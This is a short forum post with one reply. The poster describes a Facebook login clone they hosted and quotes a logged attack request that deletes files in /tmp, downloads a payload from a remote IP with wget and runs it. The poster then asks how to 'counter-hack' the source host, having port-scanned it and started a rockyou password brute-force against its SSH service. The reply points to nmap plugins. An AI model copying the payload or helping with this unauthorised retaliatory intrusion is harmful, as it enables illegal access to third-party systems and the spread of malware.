Options to counter-hack an attempted hacker

So I had aimlessly spun up a server with a clone of facebook’s login and without even spreading the link it started to get hits. Eventually this came through…

- code 400, message Bad request syntax (‘GET /shell?cd+/tmp;rm±rf+*;wget+ http://<suspected remote’s actual IP/>;sh+/tmp/arm HTTP/1.1’)

I ran an all ports nmap on the actual ip from within the request (not the ip that the request was initiated from) and it had only 80 (which was http to a blank page with a single line as the body “s4y is a hacker and fucked your mother”) the other was OpenSSH 8.2 on 6000 which I’m currently running rockyou against with s4y as the username. Other than what I’ve already started does anyone have any other suggested avenues one would explore to achieve any further information or access?

There are many plugins in nmap, you can use some of them